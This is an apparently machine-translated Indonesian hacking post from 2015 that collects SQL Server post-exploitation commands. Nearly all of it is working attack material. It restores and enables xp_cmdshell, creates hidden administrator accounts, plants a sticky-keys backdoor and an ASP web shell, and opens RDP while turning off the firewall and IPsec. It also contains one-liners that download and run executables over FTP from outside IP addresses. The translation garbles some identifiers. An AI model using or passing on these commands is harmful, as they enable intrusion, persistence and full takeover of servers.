|
|
Diposting pada 18/03/2015 10.36.56
|
|
|
|

1433 Pesanan Perbaikan
pengguna bersih SQLDebugger daftar /add administrator grup lokal net SQLDebugger /add
Pesan Kesalahan: Gagal menemukan prosedur tersimpan 'master.. xp_cmdshell'。
Metode perbaikan: sangat umum, pada kenyataannya, 126 127 lainnya dapat diperbaiki bersama,
Kecuali xplog70.dll yang lainnya dapat diperbaiki dengan perintah ini
xp_cmdshell metode pemulihan baru Langkah 1: Hapus: Prosedur Drop sp_addextendedproc Prosedur Drop sp_oacreate eksekutif sp_dropextendedproc 'xp_cmdshell' Server: Msg 3701, Level 11, Negara Bagian 5, Baris 1 Tidak mungkin untuk menghapus proses 'sp_addextendedproc' karena tidak ada di direktori sistem. Server: Msg 3701, Level 11, Status 5, Prosedur sp_dropextendedproc, Baris 18 Tidak mungkin untuk menghapus proses 'xp_cmdshell' karena tidak ada di direktori sistem. Langkah 2 Pemulihan: dbcc addextendedproc ("sp_oacreate","odsole70.dll") DBCC AddExtendedProc ("xp_cmdshell","xplog70.dll") Pemulihan langsung, terlepas dari apakah sp_addextendedproc ada atau tidak
xplog70.dll perbaikan:
Pesan Kesalahan: xplog70.dll DLL atau salah satu DLL yang direferensikan oleh DLL tidak dapat dipasang. Alasan: 126 (Modul yang ditentukan tidak dapat ditemukan.) )。
Perbaiki XPLOG70.DLL (pertama-tama periksa direktori cadangan \x86\bin dengan file, lalu ganti direktori berikut)
Langkah 1 eksekutif sp_dropextendedproc 'xp_cmdshell' Langkah 2 DBCC addextendedproc ("xp_cmdshell","c:\sql2ksp4\x86\binn\xplog70.dll")
Gagal menemukan prosedur tersimpan 'master.. xp_cmdshell'。 Langkah 1: Membuat prosedur sp_addextendedproc --- 1996/08/30 20:13 @functname nvarchar(517),/* (pemilik.) nama fungsi yang akan dipanggil
*/ @dllname varchar(255)/* nama DLL yang mengandung fungsi */ sebagai Atur implicit_transactions jika @@trancount > 0 mulai raiserror(15002,-1,-1,'sp_addextendedproc') Kembali (1) akhir dbcc addextendedproc( @functname, @dllname) Kembali (0) -- sp_addextendedproc PERGI
Langkah 2: EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'mendeklarasikan @o int
SQL Server memblokir akses ke proses 'sys.xp_cmdshell' komponen 'xp_cmdshell' karena komponen ini dimatikan sebagai bagian dari konfigurasi keamanan untuk server ini. Administrator sistem dapat mengaktifkan 'xp_cmdshell' dengan menggunakan sp_configure. Untuk informasi selengkapnya tentang mengaktifkan xp_cmdshell, lihat Konfigurator Aplikasi Periferal dalam seri Buku Online SQL Server.
; EXEC sp_configure 'tampilkan opsi lanjutan', 1 -- ; KONFIGURASI ULANG DENGAN PENGGANTIAN -- ; EXEC sp_configure 'xp_cmdshell', 1 -- ; KONFIGURASI ULANG DENGAN PENGGANTIAN -- ; EXEC sp_configure 'tampilkan opsi lanjutan', 0 --
Hapus penyimpanan berbahaya SQL: PROSEDUR DROP sp_makewebtask master eksekutif .. sp_dropextendedproc xp_cmdshell master eksekutif .. sp_dropextendedproc xp_dirtree master eksekutif .. sp_dropextendedproc xp_fileexist master eksekutif .. sp_dropextendedproc xp_terminate_process master eksekutif .. sp_dropextendedproc sp_oamethod master eksekutif .. sp_dropextendedproc sp_oacreate master eksekutif .. sp_dropextendedproc xp_regaddmultistring master eksekutif .. sp_dropextendedproc xp_regdeletekey master eksekutif .. sp_dropextendedproc xp_regdeletevalue master eksekutif .. sp_dropextendedproc xp_regenumkeys master eksekutif .. sp_dropextendedproc xp_regenumvalues master eksekutif .. sp_dropextendedproc sp_add_job master eksekutif .. sp_dropextendedproc sp_addtask master eksekutif .. sp_dropextendedproc xp_regread master eksekutif .. sp_dropextendedproc xp_regwrite master eksekutif .. sp_dropextendedproc xp_readwebtask master eksekutif .. sp_dropextendedproc xp_makewebtask master eksekutif .. sp_dropextendedproc xp_regremovemultistring master eksekutif .. sp_dropextendedproc sp_OACreate PROSEDUR DROP sp_addextendedproc
Pulihkan prosedur tersimpan yang diperpanjang Pulihkan sp_addextendedproc terlebih dahulu, pernyataannya adalah sebagai berikut: Pertama: Membuat prosedur sp_addextendedproc --- 1996/08/30 20:13 @functname nvarchar(517),/* (pemilik.) nama fungsi untuk memanggil */ @dllname varchar(255)/* nama DLL yang berisi fungsi */ sebagai Atur implicit_transactions jika @@trancount > 0 mulai raiserror(15002,-1,-1,'sp_addextendedproc') Kembali (1) akhir dbcc addextendedproc( @functname, @dllname) Kembali (0) -- sp_addextendedproc PERGI
Kedua: Gunakan Master eksekutif sp_addextendedproc xp_cmdshell,'xp_cmdshell.dll' eksekutif sp_addextendedproc xp_dirtree,'xpstar.dll' sp_addextendedproc xp_enumgroups eksekutif, 'xplog70.dll' eksekutif sp_addextendedproc xp_fixeddrives,'xpstar.dll' sp_addextendedproc xp_loginconfig eksekutif, 'xplog70.dll' eksekutif sp_addextendedproc xp_enumerrorlogs,'xpstar.dll' sp_addextendedproc xp_getfiledetails eksekutif, 'xpstar.dll' eksekutif sp_addextendedproc sp_OACreate,'odsole70.dll' eksekutif sp_addextendedproc sp_OADestroy,'odsole70.dll' sp_addextendedproc sp_OAGetErrorInfo eksekutif, 'odsole70.dll' eksekutif sp_addextendedproc sp_OAGetProperty,'odsole70.dll' sp_addextendedproc sp_OAMethod eksekutif, 'odsole70.dll' eksekutif sp_addextendedproc sp_OASetProperty,'odsole70.dll' eksekutif sp_addextendedproc sp_OAStop,'odsole70.dll' eksekutif sp_addextendedproc xp_regaddmultistring,'xpstar.dll' sp_addextendedproc xp_regdeletekey eksekutif, 'xpstar.dll' eksekutif sp_addextendedproc xp_regdeletevalue,'xpstar.dll' eksekutif sp_addextendedproc xp_regenumvalues,'xpstar.dll' eksekutif sp_addextendedproc xp_regread,'xpstar.dll' eksekutif sp_addextendedproc xp_regremovemultistring,'xpstar.dll' sp_addextendedproc xp_regwrite eksekutif, 'xpstar.dll' eksekutif sp_addextendedproc xp_availablemedia,'xpstar.dll'
Hapus pernyataan yang memperluas prosedur tersimpan xp_cmdshell: eksekutif sp_dropextendedproc 'xp_cmdshell'
Memulihkan pernyataan sql cmdshell eksekutif sp_addextendedproc xp_cmdshell ,@dllname = 'xplog70.dll'
Buka pernyataan cmdshell SQL eksekutif sp_addextendedproc xp_cmdshell ,@dllname = 'xplog70.dll'
Menentukan apakah perluasan penyimpanan ada Pilih count(*) dari master.dbo.sysobjects di mana xtype='x' dan name='xp_cmdshell' Hasil yang dikembalikan adalah 1 dan tidak apa-apa
Pulihkan xp_cmdshell exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll'; Pilih count(*) dari master.dbo.sysobjects di mana xtype='x' dan name='xp_cmdshell' Hasil yang dikembalikan adalah 1 dan tidak apa-apa Jika tidak, unggah xplog7.0.dll exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
Blokir pernyataan sql cmdshell sp_dropextendedproc "xp_cmdshell
Satu. Mengubah Metode Kata Sandi SA: Setelah terhubung dengan SQL Comprehensive Utilization Tool, jalankan perintah: exec sp_password NULL, 'kata sandi baru', 'sa' (Petunjuk: gunakan dengan hati-hati!)
Dua. Cukup tambal kata sandi yang lemah.
Metode 1: Kueri pemisah setelah menghubungkan: jika ada (pilih * dari dbo.sysdi mana id = object_id(N'[dbo].[ xp_cmdshell]') dan OBJECT(id, N'IsExtendedProc') = 1)
eksekutif sp_dropextendedproc N'[dbo]. [xp_cmdshell]'
PERGI Kemudian tekan tombol F5 untuk menjalankan perintah
Metode 2: Kueri setelah splitter terhubung Langkah pertama adalah mengeksekusi: gunakan master Langkah 2: sp_dropextendedproc 'xp_cmdshell' Kemudian tekan tombol F5 untuk menjalankan perintah
xpsql70.dll DLL atau salah satu DLL yang direferensikan oleh DLL tidak dapat dipasang. Alasan 126 (Modul yang ditentukan tidak dapat ditemukan. ) Metode pemulihan: Setelah mengkueri koneksi splitter, Langkah 1: sp_dropextendedproc "xp_cmdshell" Langkah 2: sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
Fungsi xp_cmdshell tidak dapat ditemukan di perpustakaan xpweb70.dll. Alasan: 127 (Program yang ditentukan tidak dapat ditemukan.) ) Metode pemulihan: Setelah mengkueri koneksi splitter, Langkah 1 Eksekusi: eksekutif sp_dropextendedproc 'xp_cmdshell' Langkah 2: eksekutif sp_addextendedproc 'xp_cmdshell', 'xpweb70.dll' Kemudian tekan tombol F5 untuk menjalankan perintah
Jika tidak ada metode di atas yang dapat dipulihkan, coba tambahkan akun secara langsung menggunakan metode berikut: Setelah mengkueri koneksi splitter, Sistem 2000servser: deklarasikan @shell int exec sp_oacreate 'wscrip remove t.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user Web hacker /add'
deklarasikan @shell int exec sp_oacreate 'wscrip remove t.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators Web /add'
Sistem XP atau 2003Server: 126 Kesalahan! Urutan
deklarasikan @shell int exec sp_oacreate 'wscrip remove t.shell', @shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user Web$ hacker /add'
deklarasikan @shell int exec sp_oacreate 'wscrip remove t.shell', @shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators Web$ /add'
C:\>DIR C:\ SQL Server memblokir akses ke proses 'sys.xp_cmdshell' komponen 'xp_cmdshell' karena komponen ini dimatikan sebagai bagian dari konfigurasi keamanan untuk server ini. Administrator sistem dapat mengaktifkan 'xp_cmdshell' dengan menggunakan sp_configure. Untuk informasi selengkapnya tentang mengaktifkan xp_cmdshell, lihat Konfigurator Aplikasi Periferal dalam seri Buku Online SQL Server.
Pernyataan yang dijalankan oleh penganalisis:
EXEC sp_configure 'tampilkan opsi lanjutan', 1; KONFIGURASI ULANG; EXEC sp_configure 'xp_cmdshell', 1; KONFIGURASI ULANG;
Terkadang, saat menjalankan pernyataan di atas dengan koneksi pemisah kueri, prosedur tersimpan tidak dapat ditemukan sp_addextendedproc
Solusi:
Membuat prosedur sp_addextendedproc --- 1996/08/30 20:13 @functname nvarchar(517),/* (pemilik.) nama fungsi untuk memanggil */ @dllname varchar(255)/* nama DLL yang mengandung fungsi */ sebagai Atur implicit_transactions jika @@trancount > 0 mulai raiserror(15002,-1,-1,'sp_addextendedproc') Kembali (1) akhir dbcc addextendedproc( @functname, @dllname) Kembali (0) -- sp_addextendedproc PERGI Kode ini ditempelkan ke dalam pembagi kueri dan dieksekusi
Penjelajah:
c:\windows\explorer.exe
Lihat daftar isi eksekutif master.dbo.xp_subdirs 'c:\' Daftar disk master eksekutif .. xp_fixeddrives
xpsql.cpp: 错误 5 来自 CreateProcess(第 737 行) 直接加帐号!
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0 Pilih * dari OpenRowSet('Microsoft.Jet.OLEDB.4.0','; Database=c:\windows\system32\ias\ias.mdb','select shell("net user 123 123 /add")'); Pilih * dari OpenRowSet('Microsoft.Jet.OLEDB.4.0','; Database=c:\windows\system32\ias\ias.mdb','select shell("net localgroup administrators 123 /add")');
echo Windows Registry Editor Versi 5.00 >3389.reg gema. >>3389.reg gema [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg echo "Diaktifkan"="0" >>3389.reg echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>3389.reg echo "ShutdownWithoutLogon"="0" >>3389.reg echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>3389.reg echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>3389.reg echo "TSEnabled"=dword:00000001 >>3389.reg gema [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg echo "Mulai"=dword:00000002 >>3389.reg gema [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>3389.reg echo "Mulai"=dword:00000002 >>3389.reg gema [HKEY_USERS\. DEFAULT\Tata Letak Keyboard\Toggle] >>3389.reg gema "Hotkey"="1" >>3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>3389.reg echo "PortNumber"=dword:00000D3D >>3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-TCP] >>3389.reg echo "PortNumber"=dword:00000D3D >>3389.reg regedit /s 3389.reg
Buka 3389:
exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0; --
Lulus 3389:
exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',1;
Lihat pelabuhan 3389
exec xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp','PortNumber'
Pintu belakang CMD normal xp_regwrite 'HKEY_LOCAL_MACHINE','PERANGKAT LUNAK \ Microsoft \ Windows NT \ Versi Saat Ini \ Opsi Eksekusi File Gambar \sethc.exe','debugger', 'reg_sz','c: \ windows \ system32\cmd.exe'
win2K langsung ke PS Mar master eksekutif .. xp_regwrite 'HKEY_LOCAL_MACHINE','PERANGKAT LUNAK\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1 Pilih * dari OpenRowset('Microsoft.jet.oledb.4.0','; database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c @echo buka 60.190.176.85>>net.txt&@echo reconditeness>>net.txt&@echo 7259>>net.txt&@echo dapatkan 0.exe>>net.txt& @echo bye>>net.txt&@ftp -s:net.txt&del net.txt & 0.exe")')
win03-XP langsung di kuda PS master eksekutif .. xp_regwrite 'HKEY_LOCAL_MACHINE','PERANGKAT LUNAK\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1 Pilih * dari OpenRowset('Microsoft.jet.oledb.4.0','; database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c @echo buka 60.190.176.85>>net.txt&@echo reconditeness>>net.txt&@echo 7259>>net.txt&@echo dapatkan 0.exe>>net.txt& @echo bye>>net.txt&@ftp -s:net.txt&del net.txt & 0.exe")')
5. Geser perintah pintu belakang Deklarasikan @o int exec sp_oacreate 'scrip remove ting.filesystemobject', @o keluar exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';
Deklarasikan @o int exec sp_oacreate 'scrip remove ting.filesystemobject', @o keluar exec sp_oamethod @o, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';
Salin C:\Windows\explorer.exe C:\Windows\System32\sethc.exe Salin c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
Deklarasikan @o int exec sp_oacreate 'wscrip remove t.shell', @o keluar exec sp_oamethod @o, 'run', NULL, 'XXXXX' \\XXXXX adalah perintah yang ingin Anda jalankan
Tulis nilai yang ditentukan dalam kunci yang ditentukan dalam registri), menggunakan metode (tulis bbb di kunci HKEY_LOCAL_MACHINE\SOFTWARE\aaa\aaaValue):
Master EXEC .. xp_regwrite
@rootkey='HKEY_LOCAL_MACHINE',
@key='PERANGKAT LUNAK\aaa',
@value_name='aaaNilai',
@type='REG_SZ',
@value='bbb'
@echo buka daftar 121.22.56.5>c:\bin.txt&@echo list>>c:\bin.txt&@echo list>>c:\bin.txt&@echo dapatkan gzn.exe>>c:\bin.txt&@echo bye>>c:\bin.txt&@ftp -s:c:\bin.txt&del c:\bin.txt&gzn.exe& gzn.exe&gzn.exe
Pertama, salin ftp.exe ke direktori wmpub @echo cd c:\wmpub\>c:\wmpub\in.bat&@echo ftp -s:c:\wmpub\xiuxiu.txt>>c:\wmpub\in.bat
Buka 3389 REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
C:\WINDOWS\system32\dllcache\net1.exe localgroup administrators IUSR_SERVER /add
SQL menulis kalimat eksekutif master.dbo.xp_subdirs 'd:\web\cdlxkj'; exec sp_makewebtask 'd:\web\cdlxkj\XX.asp','select''<%execute(request("SB"))%>'' '
Promosi Mode Sandbox SA ----- ---------------------- master eksekutif .. xp_regwrite 'HKEY_LOCAL_MACHINE','PERANGKAT LUNAK\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0; ------------------------------------------------------- Pilih * dari OpenRowSet('Microsoft.Jet.OLEDB.4.0','; Database=c:\windows\system32\ias\ias.mdb','select shell("net user sql$ 123 /add")'); ------------------------------------------------------- Pilih * dari OpenRowSet('Microsoft.Jet.OLEDB.4.0','; Database=c:\windows\system32\ias\ias.mdb','select shell("net localgroup administrators sql$ /add")');
3389 PERGESERAN
Kalimat yang digunakan: Invasi Master EXEC .. xp_regwrite @rootkey='HKEY_LOCAL_MACHINE', @key='PERANGKAT LUNAK\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc. EXE', @value_name='Debugger', @type='REG_SZ', @value='C:\WINDOWS\explorer.exe'
Pemulihan Master EXEC .. xp_regwrite @rootkey='HKEY_LOCAL_MACHINE', @key='PERANGKAT LUNAK\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc. EXE', @value_name='Debugger', @type='REG_SZ', @value=''
Pembajakan gambar
Master EXEC .. xp_regwrite --- ini adalah pengeditan registri! @rootkey='HKEY_LOCAL_MACHINE', ---Ini posisinya! @key='PERANGKAT LUNAK\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc. EXE', -----Ini juga posisinya! @value_name='Debugger', --- ini adalah nama tabel! @type='REG_SZ', --- inilah arti menulis! @value='C:\WINDOWS\explorer.exe' ---- berikut adalah konten tertulisnya!
Seluruh proses adalah menggunakan master: xp_regwrite komponen ini dilakukan,
1.sql perintah untuk menanyakan apakah kunci lengket registri telah dibajak
master eksekutif .. xp_regread 'HKEY_LOCAL_MACHINE','PERANGKAT LUNAK \ Microsoft \ Windows NT \ Versi Saat Ini \ Opsi Eksekusi File Gambar \sethc.exe','Debugger'
2.sql membajak fungsi kunci melekat registri dan menggantinya dengan pengelola tugas (tentu saja Anda dapat menggantinya dengan perintah lain yang Anda inginkan)
xp_regwrite 'HKEY_LOCAL_MACHINE', 'PERANGKAT LUNAK \ Microsoft \ Windows NT \ CurrentVersion \ Opsi Eksekusi File Gambar \ sethc.exe', 'Debugger','REG_SZ','C:\WINDOWS\system32\taskmgr.exe'
3.sql perintah untuk menghapus fitur pembajakan dari kunci lengket registri melindungi server Anda agar tidak dieksploitasi oleh orang lain
xp_regdeletekey 'HKEY_LOCAL_MACHINE', 'PERANGKAT LUNAK \ Microsoft \ Windows NT \ Versi Saat Ini \ Opsi Eksekusi File Gambar \ sethc.exe'
SQL menulis file
Deklarasikan @o int, @f int, @t int, @ret int exec sp_oacreate 'scrip remove ting.filesystemobject', @o keluar exec sp_oamethod @o, 'createtextfile', @f keluar, 'c:\1.vbs', 1 exec @ret = sp_oamethod @f, 'writeline', NULL,'set wsnetwork=CreateObject("Wscrip hapus t.NETWORK")' exec @ret = sp_oamethod @f, 'writeline', NULL,'os="WinNT://"&wsnetwork. Nama Komputer' exec @ret = sp_oamethod @f, 'writeline', NULL,'Set ob=GetObject(os)' exec @ret = sp_oamethod @f, 'writeline', NULL,'Set oe=GetObject(os&"/Administrators,group")' exec @ret = sp_oamethod @f, 'writeline', NULL,'Set od=ob. Buat("pengguna","uji")' exec @ret = sp_oamethod @f, 'writeline', NULL,'od. SetPassword "1234"' exec @ret = sp_oamethod @f, 'writeline', NULL,'od. SetInfo ' exec @ret = sp_oamethod @f, 'writeline', NULL,'Set of=GetObject(os&"/test",user) ' exec @ret = sp_oamethod @f, 'writeline', NULL,'oe.add os&"/test"'
Skrip tanpa eskalasi NET
struser=wscrip untuk menghapus t.arguments(0) strpass=wscrip untuk menghapus t.arguments(1)
set lp=createObject("Wscrip hapus t.NETWORK") oz="WinNT://"&lp. Nama Komputer Atur ob=GetObject(oz) Atur oe=GetObject(oz&"/Administrators,group") Atur od=ob.create("pengguna",struser) od. SetPassword strpass od. SetInfo Set of=GetObject(oz&"/" & struser & ",user") oe. Tambahkan (dari. ADsPath)
Untuk Setiap admin di oe. Anggota jika struser=admin. Namakan kemudian Wscrip menghapus t.echo struser & "Berhasil didirikan!" wscrip untuk menghapus t.quit berakhir jika Selanjutnya
Wscrip hapus t.echo struser & "Pembuatan pengguna gagal!" Simpan di atas sebagai pengguna. File VBS Kemudian jalankan: cscrip untuk menghapus kata sandi nama pengguna user.vbs
Dengan menggunakan mode kotak pasir JET, Anda dapat memecahkan masalah yang disebabkan oleh prosedur tersimpan seperti XP_cmdshell dan pustaka tautan dinamis terkait. Untuk alasan keamanan, sistem tidak mengaktifkan mode kotak pasir secara default, yang mengharuskan xp_regwrite untuk mengaktifkan mode kotak pasir:
Eksekutif master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','PERANGKAT LUNAK\Microsoft\Jet\4.0 \Mesin','SandBoxMode','REG_DWORD',1
Kemudian jalankan perintah sandbox untuk menambahkan user named test dengan kata sandi 1234 ke sistem:
Pilih * dari OpenRowset('Microsoft.jet.oledb.4.0','; database=c:\windows \system32\ias\ias.mdb','select shell("cmd.exe /c net user test 1234 /add")')
Pilih * dari OpenRowset('Microsoft.jet.oledb.4.0','; database=c:\windows \system32\ias\ias.mdb','select shell("cmd.exe /c net localgroup administrator menguji /add")')
Sistem operasi yang berbeda memiliki jalur yang berbeda dan perlu dimodifikasi sesuai dengan situasi:
NT/2K: c:\winnt\system32\ XP/2003: c:\windows\system32\
Selain itu, di Microsoft SQL Server 2005, beberapa prosedur tersimpan ditutup secara default dan memerlukan perintah untuk membuka:
Nyalakan XP_cmdshell:
EXEC sp_configure 'tampilkan opsi lanjutan', 1; KONFIGURASI ULANG; EXEC sp_configure 'xp_cmdshell', 1; KONFIGURASI ULANG;
Buka 'OPENROWSET':
eksekutif sp_configure 'tampilkan opsi lanjutan', 1; KONFIGURASI ULANG; sp_configure eksekutif 'Kueri Terdistribusi Ad Hoc',1; KONFIGURASI ULANG;
Nyalakan 'sp_oacreate':
eksekutif sp_configure 'tampilkan opsi lanjutan', 1; KONFIGURASI ULANG; sp_configure eksekutif 'Prosedur Otomasi Ole',1; KONFIGURASI ULANG;
Berikut adalah beberapa situasi di mana perintah eksekusi di bawah sa salah: 1. xpsql70.dll DLL atau DLL yang direferensikan oleh DLL tidak dapat dimuat. Alasan 126 (Modul yang ditentukan tidak dapat ditemukan. ) Situasi ini relatif umum, dan perbaikannya sederhana dan sederhana, tetapi ada kondisi. Jika Anda dapat mencantumkan direktori dalam hal ini (dengan sqltools v2.0 ada fungsi direktori) Selamat atas situasi 80% ini dapat diperbaiki, jika Anda dapat mencantumkan direktori, maka temukan saja jalur xplog70.dll dan jalankan perintah berikut. Langkah 1 exec sp_dropextendedproc 'xp_cmdshell' (perintah ini untuk menghapus cmdshell asli, karena sudah salah) Langkah 2 dbcc addextendedproc ("xp_cmdshell","c:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll") ; EXEC sp_configure 'tampilkan opsi lanjutan', 0 – Tentu saja ini adalah perintah sql, dijalankan dengan query analyzer. C:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll pada langkah kedua adalah jalur xplog70.dll, jalur ini relatif umum, jika drive c tidak memilikinya, Anda dapat menemukan huruf drive lainnya. 2. Tidak dapat menemukan fungsi xp_cmdshell di perpustakaan xpweb70.dll. Alasan: 127 (Program yang ditentukan tidak dapat ditemukan.) ) Padahal, ini sama dengan 126 di atas, yaitu cmdshell salah, selama Anda menemukan cadangan xplog70.dll ikuti metode di atas untuk memperbaikinya. 3. Gagal menemukan 'master' prosedur tersimpan. xpcmdshell' Dalam hal ini, saya melihat di Internet bahwa metodenya adalah: Langkah 1: Hapus: Prosedur Drop sp_addextendedproc Prosedur Drop sp_oacreate eksekutif sp_dropextendedproc 'xp_cmdshell' Langkah 2 Pemulihan: dbcc addextendedproc ("sp_oacreate","odsole70.dll") DBCC AddExtendedProc ("xp_cmdshell","xplog70.dll") Faktanya, ini masih sama dengan di atas, nyatanya jika Anda berhati-hati, 126 127 di atas hanya akan gagal menemukan prosedur tersimpan 'master:. xpcmdshell' karena langkah pertama adalah menghapus prosedur CMDSHELL yang tersimpan. Jadi dalam hal ini, ikuti saja langkah kedua di atas. 4. Pesan Kesalahan: SQL Server memblokir akses untuk memproses 'sys.xp_cmdshell' komponen 'xp_cmdshell' karena komponen ini dimatikan sebagai bagian dari konfigurasi keamanan server ini. Administrator sistem dapat mengaktifkan 'xp_cmdshell' dengan menggunakan sp_configure. Untuk informasi selengkapnya tentang mengaktifkan xp_cmdshell, lihat Konfigurator Aplikasi Periferal dalam seri Buku Online SQL Server. Situasi ini adalah yang paling sederhana, karena Anda tidak perlu memikirkan apa pun, cukup jalankan perintah berikut ; EXEC sp_configure 'tampilkan opsi lanjutan', 1 -- ; KONFIGURASI ULANG DENGAN PENGGANTIAN -- ; EXEC sp_configure 'xp_cmdshell', 1 -- ; KONFIGURASI ULANG DENGAN PENGGANTIAN -- ; EXEC sp_configure 'tampilkan opsi lanjutan', 0 –
Setelah perbaikan di atas, Anda dapat menjalankan perintah cmd, dan Anda akan mulai meningkatkan kekuatan Anda. Saya biasanya memeriksa ip terlebih dahulu untuk melihat apakah itu intranet, dan kemudian REG kueri HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber untuk memeriksa port terminal, dan kemudian netstat –an untuk melihat apakah terminal terbuka dan kemudian kata sandi pengguna bersih / tambahkan pengguna dan kemudian administrator grup lokal net pengguna /add Jika semuanya berjalan dengan baik, ini akan melumpuhkan server. Tetapi ada banyak masalah dalam prosesnya. 1. Promosi daya bersih berhasil tetapi tidak dapat terhubung ke terminal Ada situasi berikut (1) Server ada di intranet. (2) Penyaringan TCP/IP. Jalankan perintah cmd berikut terlebih dahulu: cmd /c regedit -e c:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip, ekspor bagian pertama registri untuk pemfilteran TCP/IP cmd /c regedit -e c:\2.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip, ekspor bagian kedua dari registri untuk pemfilteran TCP/IP cmd /c regedit -e c:\3.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip", mengekspor tempat ketiga dalam registri tentang pemfilteran TCP/IP Kemudian kembali ke c drive 1.reg, 2.reg, 3.reg, download 1.reg, 2.reg, 3.reg kembali ke hard drive Anda untuk mengedit, temukan bidang EnableSecurityFilters untuk melihat apakah nilai kunci setelah dword adalah 000000000, jika sudah 00000001, berarti administrator telah melakukan penyaringan tcp/ip, kita hanya perlu mengubah 1 menjadi 0, 2. reg dan 3.reg membuat perubahan yang sama. (3) Buat kebijakan keamanan IP. Jalankan perintah cmd: cmd /c net stop policyagent untuk menghentikan layanan Layanan IPSEC. Hubungkan terminal lagi. (4) Izin login terminal yang ditetapkan oleh administrator hanya dapat digunakan oleh pengguna yang ditentukan. (5) Firewall. Jalankan perintah cmd: net stop alg /ynet stop sharedaccess
2. Eskalasi NET muncul dan akses ditolak Anda dapat mencoba net1 user user password /add Jika net1 juga menolak akses, Anda dapat menyalin backdoor shfit dan mencoba menjalankan perintah cmd: copy c:\windows\explorer.exe c:\windows\system32\sethc.exe Salin c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe Jika diminta, salin 1 file yang terbukti berhasil. Hubungkan ke terminal dan tekan 5 shift untuk melihat apa yang muncul. Mainkan dengan Kaka Explorer, sekarang cukup tambahkan pengguna dengan tangan. 3. Eskalasi bersih terjadi dengan kesalahan penolakan akses 5 (sorotan) Dalam hal ini, Anda tidak perlu mencoba net1, Anda dapat mencoba backdoor copy shift, jika salinan meminta untuk menyalin file 0, itu membuktikan bahwa itu tidak berhasil. Kemudian Anda dapat mencoba mengunggahnya, jika Anda dapat mengunggahnya, Anda dapat langsung mengirim alat eskalasi daya non-net yang keluar beberapa waktu lalu, lalu menambahkan pengguna. Tetapi sebagian besar kasus ini tidak dapat diunggah, jadi Anda harus memikirkannya. Karena cmd dapat dieksekusi, maka file dapat diunduh melalui cmd di bawah ftp, tetapi premis ftp adalah untuk dapat menulis teks atau pemrosesan batch. Kemudian Anda dapat menulis teks atau batch melalui pernyataan SQL. Deklarasikan @o int, @f int, @t int, @ret int exec sp_oacreate 'scrip remove ting.filesystemobject', @o keluar exec sp_oamethod @o, 'createtextfile', @f out, 'C:\1.bat', 1 exec @ret = sp_oamethod @f, 'writeline', NULL,'open IP' exec @ret = sp_oamethod @f, 'writeline', NULL, 'akun ftp' exec @ret = sp_oamethod @f, 'writeline', NULL, 'kata sandi ftp' exec @ret = sp_oamethod @f, 'writeline', NULL, 'get en.exe (tanpa skrip eskalasi bersih) c:\en.exe' exec @ret = sp_oamethod @f, 'writeline', NULL,'bye' Setelah penganalisis kueri berhasil dieksekusi, 1.bat akan muncul di drive C (jika eksekusi berhasil, tetapi drive C tidak ada, Anda dapat mengubah folder untuk ditulis, karena direktori root drive C server mana yang melarang penulisan) Kemudian cmd mengeksekusi ftp -s:c:\1.bat Setelah ini dijalankan, Anda akan mengunduh skrip eskalasi non-net 